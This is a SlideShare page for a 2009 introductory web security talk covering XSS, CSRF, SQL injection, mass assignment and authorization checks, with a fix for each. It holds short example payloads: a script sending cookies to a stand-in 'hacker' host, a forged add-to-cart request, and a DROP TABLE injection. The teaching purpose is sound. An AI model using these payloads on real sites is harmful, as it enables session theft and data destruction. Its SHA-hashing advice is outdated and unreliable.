Web Security 101
Who is this guy? Brian Dailey realm3 web applications
Security is serious.
Even when you might think it's not.
TRUST ME Security is all about trust.
Physical Network Server Application
XSS The user believes  you are this guy: But this guy is really watching:
XSS: Methods Non-persistent: Entice user to load page (either by clicking a link or a hidden frame) and inject client-side...
XSS Give me back my session! <script> document.write('<img src=” http://my.hacker.com/ me.php?cookie=' + document.cookie +...
XSS Another example: Embed a form that captures a saved password, collect it. If you can inject Javascript or HTML, you ca...
XSS Prevention Always Escape Output How you escape depends upon context. <ul><li>URL Encoded
HTML Entities
White listing HTML tags (black listing is tricky!) </li></ul>
CSRF (Cross-site Request Forgery) Exploit server's trust of user.
CSRF You think this is your user: But really it is:
CSRF Example: <img src=” http://your.site.com/addtocart.php?item-id=12&ship_to=l33t_haxor ” height=”1” width=”1” /> Works ...
CSRF Prevention Techniques Authorize each user action. Don't use GET when modifying data.
SQL Injection
SQL Injection String sql = “SELECT * FROM users WHERE name LIKE '%” + name + “'”; http://www.subgenius.com/person.jsp?name...
SQL Injection Prevention This one is pretty easy: use parameterized statements. (You could also escape control characters,...
Frameworks are helpful.
They can come with their own set of issues.
Mass Assignment
Mass Assignment Rails Example: @user = User.find(current_user.id) @user.update_attributes(params[:user]) If I POST user[is...
Mass Assignment Symfony: If you're using Forms, you're not vulnerable. (Kudos to Symfony.) CakePHP: # Anything about $this...
Ownership
Ownership Authorization Rails: # bad @post = Post.find(params[:id]) # good @post = current_user.posts.find(params[:id])
Ownership Authorization CakePHP: // bad $post = $this->Post->findById($id); // good $post = $this->Post->find( array('cond...
Ownership Authorization Symfony: // bad $post = Doctrine::getTable('Post')->find($id); // good $post = Doctrine_Query::cre...
Other Considerations > Rate limit user login attempts to prevent brute-force attacks. + Use caching (memcache) to track at...
Upcoming SlideShare
Loading in …5
×

2009 Barcamp Nashville Web Security 101

2,523 views

Published on

A super-brief (25 minute) talk on the basics of web security. A video (with poor audio that doesn't kick in until 9 minutes in, I'm sorry) is available here:
http://www.ustream.tv/recorded/2369801

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,523
On SlideShare
0
From Embeds
0
Number of Embeds
53
Actions
Shares
0
Downloads
14
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

2009 Barcamp Nashville Web Security 101

  1. 1. Web Security 101
  2. 2. Who is this guy? Brian Dailey realm3 web applications
  3. 3. Security is serious.
  4. 4. Even when you might think it's not.
  5. 5. TRUST ME Security is all about trust.
  6. 6. Physical Network Server Application
  7. 7. XSS The user believes you are this guy: But this guy is really watching:
  8. 8. XSS: Methods Non-persistent: Entice user to load page (either by clicking a link or a hidden frame) and inject client-side script. Persistent: Save to the database and get users to load the page with the client-side script.
  9. 9. XSS Give me back my session! <script> document.write('<img src=” http://my.hacker.com/ me.php?cookie=' + document.cookie + '” width=”1” height=”1” />'); </script>
  10. 10. XSS Another example: Embed a form that captures a saved password, collect it. If you can inject Javascript or HTML, you can do all sorts of nefarious things.
  11. 11. XSS Prevention Always Escape Output How you escape depends upon context. <ul><li>URL Encoded
  12. 12. HTML Entities
  13. 13. White listing HTML tags (black listing is tricky!) </li></ul>
  14. 14. CSRF (Cross-site Request Forgery) Exploit server's trust of user.
  15. 15. CSRF You think this is your user: But really it is:
  16. 16. CSRF Example: <img src=” http://your.site.com/addtocart.php?item-id=12&ship_to=l33t_haxor ” height=”1” width=”1” /> Works especially well with GET requests, but using POST is not a surefire way to prevent this.
  17. 17. CSRF Prevention Techniques Authorize each user action. Don't use GET when modifying data.
  18. 18. SQL Injection
  19. 19. SQL Injection String sql = “SELECT * FROM users WHERE name LIKE '%” + name + “'”; http://www.subgenius.com/person.jsp?name=foobar ”;+DROP+TABLE+USERS--
  20. 20. SQL Injection Prevention This one is pretty easy: use parameterized statements. (You could also escape control characters, but there are issues with that.) String sql = &quot;SELECT * FROM users WHERE name LIKE ?&quot;; java.sql.PreparedStatement stmt = Conn.prepareStatement(sql); stmt.setString(1, request.getParameter(&quot;name&quot;));
  21. 21. Frameworks are helpful.
  22. 22. They can come with their own set of issues.
  23. 23. Mass Assignment
  24. 24. Mass Assignment Rails Example: @user = User.find(current_user.id) @user.update_attributes(params[:user]) If I POST user[is_admin] = 1 W00t! I pwned u! Fix by using attr_accessible (in model) or by whitelisting. http://www.quarkruby.com/2007/9/20/ruby-on-rails-security-guide
  25. 25. Mass Assignment Symfony: If you're using Forms, you're not vulnerable. (Kudos to Symfony.) CakePHP: # Anything about $this->data could be changed! # This makes me sad. $this->Post->save($this->data);
  26. 26. Ownership
  27. 27. Ownership Authorization Rails: # bad @post = Post.find(params[:id]) # good @post = current_user.posts.find(params[:id])
  28. 28. Ownership Authorization CakePHP: // bad $post = $this->Post->findById($id); // good $post = $this->Post->find( array('conditions' => array( 'id' => $id, 'user_id' => $this->Auth->user('id'), ) );
  29. 29. Ownership Authorization Symfony: // bad $post = Doctrine::getTable('Post')->find($id); // good $post = Doctrine_Query::create() ->select('*') ->from('Post p') ->where('p.id = ?', $id) ->where('p.user_id = ?', $user_id );
  30. 30. Other Considerations > Rate limit user login attempts to prevent brute-force attacks. + Use caching (memcache) to track attempts. > Always apply hash to user passwords + Md5 is no good, use Sha1, Sha256 & Salt Useful Resources Potential Attacks Overview (OWASP has a ton of info!) http://www.owasp.org/index.php/Category:Attack Google Code University on Web Security http://code.google.com/edu/security/index.html Rails Security Guide http://www.quarkruby.com/2007/9/20/ruby-on-rails-security-guide
  31. 31. Wrapping Things Up DO: Assume that users can be malicious. Assume that your data is important (it should be!) DON'T: Assume your framework handles all security concerns. Assume your application is “unbreakable.”
  32. 32. Thanks! Any questions? Brian Dailey realm3 web applications Web: http://realm3.com/ Twitter: @brian_dailey Email: brian@realm3.com/ Phone: 917-512-3594 slide-bg: http://bit.ly/xc0m1 Kudos to: http://asi9.net/

×